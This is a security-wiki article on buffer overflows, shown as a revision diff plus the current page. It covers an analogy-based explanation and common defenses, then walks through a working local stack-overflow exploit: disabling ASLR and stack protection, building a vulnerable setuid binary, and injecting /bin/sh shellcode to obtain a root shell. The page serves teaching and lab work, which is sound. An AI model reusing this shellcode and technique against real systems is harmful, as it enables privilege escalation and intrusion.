Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Buffer overflow"

From NetSec
Jump to: navigation, search
(Description)
Line 2: Line 2:
  
 
==Description==
 
==Description==
For example, when an Alzheimer's patient is confronted with a particular set of circumstances, s/he may try to remember what s/he should do in that situation. When the patient tries to remember what to do, the patient may remember the wrong thing - and therefore do something different. If a psychologist had inserted false memories, so that the patient remembered what the psychologist wanted them to and acted according to the psychologist's instructions, the psychologist has then controlled the Alzheimer’s patient. The same follows for a computer. A computer receives [[input]], remembers what to do with the [[input]], and then does it. If an attacker on the internet could control the memory of a computer, the computer would remember the wrong thing to do, and do it because it doesn't know any better. This is what happens during a buffer overflow attack.
+
A computer receives [[input]], remembers what to do with the [[input]], and then does it. If an attacker on the internet could control the memory of a computer, the computer would remember the wrong thing to do, and do it because it doesn't know any better. This is what happens during a buffer overflow attack.
 
+
The memory of a computer is much like a post office. Each piece of mail goes to a mailbox or a P.O. box, and each P.O. box can only hold one piece of mail at a time. Suppose for a moment that the post office that represents the computer's memory has 500 P.O. boxes. Boxes 1-200 are for data that the user sends into the computer, and boxes 201-500 hold instructions for what to do with that data. Now what happens if a user sends in 300 pieces of data or mail? Well a secure program would tell the user "I can only hold 200 pieces, I'm not taking any more mail", but an insecure program would simply take all the data into boxes 1-300. So now, when the computer remembers what to do, it lands on P.O. box 201. If the user was an attacker, couldn't s/he put malicious instructions inside of P.O. box 201? Of course! This is why the buffer overflow is such a dangerous [[vulnerability]]. Though it is a dying attack vector, the buffer overflow is still very prominent today.
+
  
 +
The memory of a computer is much like a post office. Each piece of mail goes to a mailbox or a P.O. box, and each P.O. box can only hold one piece of mail at a time. Suppose for a moment that the post office that represents the computer's memory has 500 P.O. boxes. Boxes 1-200 are for data that the user sends into the computer, and boxes 201-500 hold instructions for what to do with that data. Now what happens if a user sends in 300 pieces of data or mail? Well a secure program would tell the user "I can only hold 200 pieces, I'm not taking any more mail", but an insecure program would simply take all the data into boxes 1-300. So now, when the computer remembers what to do, it lands on P.O. box 201. If the user was an attacker, malicious instructions at P.O. box 201 would be executed! This is why the buffer overflow is such a dangerous [[vulnerability]]. {{notice|Though it is a dying attack vector, the buffer overflow is still very prominent today.}}
 
In all actuality, there is a [[return address]] that the computer uses to remember where its instructions are. So if an attacker filled up P.O. boxes 1-201, and 201 contained the return address, and the attacker changed the return address to P.O. box 1, the computer would execute the data instead of just keeping it in memory. This means that the attacker has to know enough about the system to know what address the malicious instructions are going to, because otherwise the attacker will not know the correct return address to put into P.O. Box 201. This means that the attacker has to have precise aim, or the attack will be unsuccessful.
 
In all actuality, there is a [[return address]] that the computer uses to remember where its instructions are. So if an attacker filled up P.O. boxes 1-201, and 201 contained the return address, and the attacker changed the return address to P.O. box 1, the computer would execute the data instead of just keeping it in memory. This means that the attacker has to know enough about the system to know what address the malicious instructions are going to, because otherwise the attacker will not know the correct return address to put into P.O. Box 201. This means that the attacker has to have precise aim, or the attack will be unsuccessful.
 +
{{protip|Debuggers such as '''IDA Pro, kgdb, gdb''', and '''ollydbg''' are very helpful for finding the correct [[return address|return pointer]] for your [[shellcode]].}}
  
 
==Defenses==
 
==Defenses==

Revision as of 17:20, 25 November 2011

Buffer overflow, or Buffer Overrun is a software error triggered when a program doesn't adequately control the amount of data that is copied over the buffer, so if this amount exceeds the preassigned capacity, remaining bytes are stored in adjacent memory areas by overwriting its original content. This may lead to arbitrary code execution and allow access to a vulnerable system.

Description

A computer receives input, remembers what to do with the input, and then does it. If an attacker on the internet could control the memory of a computer, the computer would remember the wrong thing to do, and do it because it doesn't know any better. This is what happens during a buffer overflow attack.

The memory of a computer is much like a post office. Each piece of mail goes to a mailbox or a P.O. box, and each P.O. box can only hold one piece of mail at a time. Suppose for a moment that the post office that represents the computer's memory has 500 P.O. boxes. Boxes 1-200 are for data that the user sends into the computer, and boxes 201-500 hold instructions for what to do with that data. Now what happens if a user sends in 300 pieces of data or mail? Well a secure program would tell the user "I can only hold 200 pieces, I'm not taking any more mail", but an insecure program would simply take all the data into boxes 1-300. So now, when the computer remembers what to do, it lands on P.O. box 201. If the user was an attacker, malicious instructions at P.O. box 201 would be executed! This is why the buffer overflow is such a dangerous vulnerability.
Notice: Though it is a dying attack vector, the buffer overflow is still very prominent today.

In all actuality, there is a return address that the computer uses to remember where its instructions are. So if an attacker filled up P.O. boxes 1-201, and 201 contained the return address, and the attacker changed the return address to P.O. box 1, the computer would execute the data instead of just keeping it in memory. This means that the attacker has to know enough about the system to know what address the malicious instructions are going to, because otherwise the attacker will not know the correct return address to put into P.O. Box 201. This means that the attacker has to have precise aim, or the attack will be unsuccessful.

Protip: Debuggers such as IDA Pro, kgdb, gdb, and ollydbg are very helpful for finding the correct return pointer for your shellcode.


Defenses

There are multiple defenses that have been incorporated into runtime in an attempt to fight buffer overflows and prevent them from taking place. One of the most recent defense mechanisms is called ASLR, which stands for Address Space Layout Randomization. It makes it so every time the computer reboots and every time a program runs, the address space that it lives in changes. In other words, following our mailbox analogy, the return address will never be in the same mailbox. The point of this is to try to prevent an attacker from performing a buffer overflow exploit because the attacker can never aim properly. Unfortunately, attackers have discovered something called "Magic Numbers", which tricks the error handler for programs and allows an attacker to aim his attack correctly without having to know a return address.

Another defense mechanism that has been implemented is called DEP, which stands for Data Execution Prevention. This is an attempt to prevent the return address from being changed into something in the same memory space as the data, and also prevent machine code (the code that buffer overflows are crafted in) from being placed into data segments. To combat this defense mechanism, attackers have developed ASCII and polymorphic ASCII machine code. ASCII and Polymorphic ASCII code looks like normal user input instead of machine code.

An even further defense mechanism is called a StackGuard, which is another layer of Data Execution Prevention. The stackguard attempts to identify all possible results of code from data within the buffer (or the data segment) and then prevent the application from calling external functions in shared objects from the inside of the buffer. A version of this has been implemented in Cisco Security Agent, or CSA.

So with CSA, ASLR, and Operating-System supplied DEP, successfully performing a buffer overflow exploit against a system running with CSA is extremely difficult. Any attacker who makes it to the point where CSA catches it is already very advanced. To successfully subvert ASLR, DEP and StackGuard one must use polymorphic ASCII shellcode, in other words, machine code that self-modifies as well as looks like standard user input and has all of its own functions built into its own code. The return address must always be specified in normal hexadecimal format, so it will usually look like some really funny characters, like squares or like strange symbols. The IDS or HIDS Context Buffer will show four squares or symbols on the end in a real buffer overflow exploit attempt on 32-bit systems, and eight squares or symbols on the end on a 64-bit system.

Maximum Effectiveness

Sometimes attackers and pen-testers alike use what is called Second Stage Shellcode. Many times firewall rules will prevent any connections outgoing from a server machine and prevent all incoming connections except for connections on the specified server port. Because of this, attackers use what is called Second Stage Shellcode to first find the connection that the exploit originated from, and then send the output of the arbitrary functions back along the first connection. This is done to circumvent firewalls and prevent a firewall from blocking a connection.

Buffer overflows can be used remotely to gain partial or total systems access, or they can be used locally to escalate privileges and permissions segments inside of the operating system in order to gain system or root level access. The real threat that a buffer overflow causes is what is called the "Zero-Day attack", also known as a buffer overflow that the security world has never seen before. Zero-Day or 0day attacks are the most devastating to the security industry, causing worms, viruses, and sometimes even hundreds of thousands of systems to be compromised in a single day.

Causes

Buffer overflows exist because a combination of insecure language compilers, insecure programmers and bad cpu architectures that keep return address from a function call in the stack. A programmer should be able to check input to the data segment with relative ease, however often times coders are either ignorant of the problem, overlook the flaw, or sometimes even a disgruntled employee might code the vulnerability into an application himself for his own personal gain after the application goes production level.

Example

Let's first disable ASLR. This makes it easier for our proof of concept to be successful. There are other methods of bypassing ASLR, but we will not cover them here.

 teknical@teknical-vm:~$ sudo -s
 [sudo] password for teknical: 
 root@teknical-vm:~# echo 0 > /proc/sys/kernel/randomize_va_space
 root@teknical-vm:~# exit
 exit
 teknical@teknical-vm:~$ 


Our test application is below. Notice we have a statically allocated buffer of 100 bytes. This is what we will be overflowing. The use of strcpy on an unchecked buffer is actually very common. It is something you should attempt to stay away from to prevent your own applications from being exploited.

 teknical@teknical-vm:~$ cat bof.c
 #include <stdlib.h>
 #include <stdio.h>
 #include <string.h>
 
 int main(int argc, char *argv[]){
 	char buffer[100];
 	strcpy(buffer,  argv[1]);
 	return 0;
 }

Lets compile our test application. We will use the -g option of gcc to tell the linker to include debugging symbols, this makes it easier for us to debug during our attempts to achieve code execution.

 teknical@teknical-vm:~$ gcc -g bof.c -o bof

Now that our test application is compiled, we can attempt to trigger the vulnerability. We know that our buffer can only hold 100 bytes, so lets test by passing it 104 bytes, which should cause an overflow. We use ruby to dynamically build a 104 byte string. You can also use perl if you prefer.


 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 *** stack smashing detected ***: ./bof terminated


Wait...What is this. By default on newer versions of gcc and other modern compilers, they include code that serves to protect the stack. We will not go into detail about that in this lession.

We need to compile our test application without the stack protection. This can be done by adding the -fno-stack-protector option to gcc.

 teknical@teknical-vm:~$ gcc -g -fno-stack-protector bof.c -o bof

Now that we have recompiled our application with no stack protection, we can again attempt to trigger the vulnerability. We will start at 104 bytes and move up until we trigger the vulnerability.

 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*108'`
 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*112'`
 Segmentation fault

Notice that it took 112 bytes to successfully overwrite the saved ebp of the running application. We are now ready to attempt exploitation. Note, that we will need 116 bytes to overwrite the return address on the stack.

For this example, we will be using a setuid binary, to ensure we gain a root shell. Set up our bof binary for setuid below.

 teknical@teknical-vm:~$ sudo chown root:root ./bof
 teknical@teknical-vm:~$ sudo chmod 4755 ./bof

DEP is another protection scheme which prevents code in the stack from being executed. We can use 'execstack' to check the status of and set our binary to have an executable stack.

The -q option will query the current status.

 teknical@teknical-vm:~$ sudo execstack -q bof
 - bof

Notice the -, which means that our application will NOT have an executable stack. This will prevent successful exploitation.

We can use the -s option to set our binary to allow execution on the stack.

 teknical@teknical-vm:~$ sudo execstack -s bof

If we query again, we will notice an X in its place, which means that our stack is now executable.

 teknical@teknical-vm:~$ sudo execstack -q bof
 X bof


Ok, back to the goods. Lets start up gdb and begin debugging.

We will use `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'` as the argument to our test application.

Lets examine this.

 `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41  \x41\x41"'`

The shell code we will be using is 45 bytes long. It is a setuid + drop shell.

 \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh

We know that we need at least 112 bytes to overwrite ebp, and another 4 to overwrite the return address. We will pad our shellcode with 60 NOPs. 60 + 45 = 105. We know that we still need 7 bytes to overwrite ebp and another 4 to overwrite the return address. I prefer to use 0x41/'A' for this portion, because it easier to debug with. We add another 7 bytes of 'A', and then 4 on the end for our return address. 60 + 45 + 7 + 4 = 116, which is the number of bytes we need to overwrite the return address, and successfully exploit our target.


Start gdb.

 teknical@teknical-vm:~$ gdb -q ./bof
 Reading symbols from /home/teknical/bof...done.

Set a breakpoint inside of our "main" function.

 (gdb) break main
 Breakpoint 1 at 0x80483ed: file bof.c, line 7.

Start our application with the command line we discussed above.

 (gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
 Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
 Breakpoint 1, main (argc=2, argv=0xbffff474) at bof.c:7
 7		strcpy(buffer,  argv[1]);

Now that we are in our main function, lets examine the stack. We know that we have at least 116 bytes on the stack, so lets examine 200 bytes to make sure we have all we need. We are looking for the address of our shell code on the stack.

 (gdb) x/200x $esp
 0xbffff340:	0x00119222	0xbffff3e4	0x080481f4	0xbffff3d8
 0xbffff350:	0x0012ca54	0x00000000	0x0012fb48	0x00000001
 0xbffff360:	0x00000000	0x00000001	0x0012c8f8	0x00293ff4
 0xbffff370:	0x00242d19	0x0016d2a5	0xbffff388	0x001549d5
 0xbffff380:	0x00293ff4	0x08049ff4	0xbffff398	0x080482e8
 0xbffff390:	0x0011e030	0x08049ff4	0xbffff3c8	0x08048439
 0xbffff3a0:	0x00294324	0x00293ff4	0x08048420	0xbffff3c8
 0xbffff3b0:	0x0016d4a5	0x0011e030	0x0804842b	0x00293ff4
 0xbffff3c0:	0x08048420	0x00000000	0xbffff448	0x00154bd6
 0xbffff3d0:	0x00000002	0xbffff474	0xbffff480	0x0012f858
 0xbffff3e0:	0xbffff430	0xffffffff	0x0012bff4	0x08048245
 0xbffff3f0:	0x00000001	0xbffff430	0x0011d626	0x0012cab0
 0xbffff400:	0x0012fb48	0x00293ff4	0x00000000	0x00000000
 0xbffff410:	0xbffff448	0xee66f487	0x3b1663f8	0x00000000
 0xbffff420:	0x00000000	0x00000000	0x00000002	0x08048330
 0xbffff430:	0x00000000	0x00123230	0x00154afb	0x0012bff4
 0xbffff440:	0x00000002	0x08048330	0x00000000	0x08048351
 0xbffff450:	0x080483e4	0x00000002	0xbffff474	0x08048420
 0xbffff460:	0x08048410	0x0011e030	0xbffff46c	0x0012c8f8
 0xbffff470:	0x00000002	0xbffff5e4	0xbffff5f7	0x00000000
 0xbffff480:	0xbffff66c	0xbffff690	0xbffff6a3	0xbffff6b3
 0xbffff490:	0xbffff6be	0xbffff70f	0xbffff721	0xbffff74b
 0xbffff4a0:	0xbffff76b	0xbffff779	0xbffffc1a	0xbffffc40
 ---Type <return> to continue, or q <return> to quit---
 0xbffff4b0:	0xbffffc52	0xbffffcae	0xbffffce0	0xbffffceb
 0xbffff4c0:	0xbffffd17	0xbffffd64	0xbffffd7a	0xbffffd89
 0xbffff4d0:	0xbffffd9c	0xbffffdb3	0xbffffdca	0xbffffdda
 0xbffff4e0:	0xbffffdee	0xbffffe23	0xbffffe2c	0xbffffe3d
 0xbffff4f0:	0xbffffe4f	0xbffffe63	0xbffffe6b	0xbffffe97
 0xbffff500:	0xbffffea8	0xbfffff0a	0xbfffff47	0xbfffff67
 0xbffff510:	0xbfffff74	0xbfffff96	0xbfffffaf	0x00000000
 0xbffff520:	0x00000020	0x0012d420	0x00000021	0x0012d000
 0xbffff530:	0x00000010	0x078bf3ff	0x00000006	0x00001000
 0xbffff540:	0x00000011	0x00000064	0x00000003	0x08048034
 0xbffff550:	0x00000004	0x00000020	0x00000005	0x00000008
 0xbffff560:	0x00000007	0x00110000	0x00000008	0x00000000
 0xbffff570:	0x00000009	0x08048330	0x0000000b	0x000003e8
 0xbffff580:	0x0000000c	0x000003e8	0x0000000d	0x000003e8
 0xbffff590:	0x0000000e	0x000003e8	0x00000017	0x00000001
 0xbffff5a0:	0x00000019	0xbffff5cb	0x0000001f	0xbfffffe9
 0xbffff5b0:	0x0000000f	0xbffff5db	0x00000000	0x00000000
 0xbffff5c0:	0x00000000	0x00000000	0x85000000	0xaaec0f53
 0xbffff5d0:	0xb8fc08c0	0xd3d76e6a	0x693bf638	0x00363836
 0xbffff5e0:	0x00000000	0x6d6f682f	0x65742f65	0x63696e6b
 0xbffff5f0:	0x622f6c61	0x9000666f	0x90909090	0x90909090
 0xbffff600:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff610:	0x90909090	0x90909090	0x90909090	0x90909090
 ---Type <return> to continue, or q <return> to quit---
 0xbffff620:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff630:	0xeb909090	0x76895e1f	0x88c03108	0x46890746
 0xbffff640:	0x890bb00c	0x084e8df3	0xcd0c568d	0x89db3180
 0xbffff650:	0x80cd40d8	0xffffdce8	0x69622fff	0x68732f6e

We are looking for our shellcode on the stack. The easiest thing to do here, is look for our NOPs. We need to find the address of our NOPs so that we can use this as the return address on the stack. This will cause execution to resume with our shell code once the function returns.

Above we can see our NOPS starting at 0xbffff5f8. We will actually be using 0xbffff610 since its a clean address. We need to arrange this in little endian format. "\x10\xf6\xff\xbf"

Lets clear our breakpoint and restart our application with the same command line argument, but replace the "\x41\x41\x41x\x41" at the end of our argument with our return address of "\x10\xf6\xff\xbf"

 (gdb) clear main
 Deleted breakpoint 1 
 (gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
 The program being debugged has been started already.
 Start it from the beginning? (y or n) y
 Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
 process 2262 is executing new program: /bin/dash
 # whoami
 root
 # 


YAY!. We have successful exploitation. If for some reason your exploitation was not successful, you could attempt a different return address. Later we will move into more advanced topics. I hope this was helpful.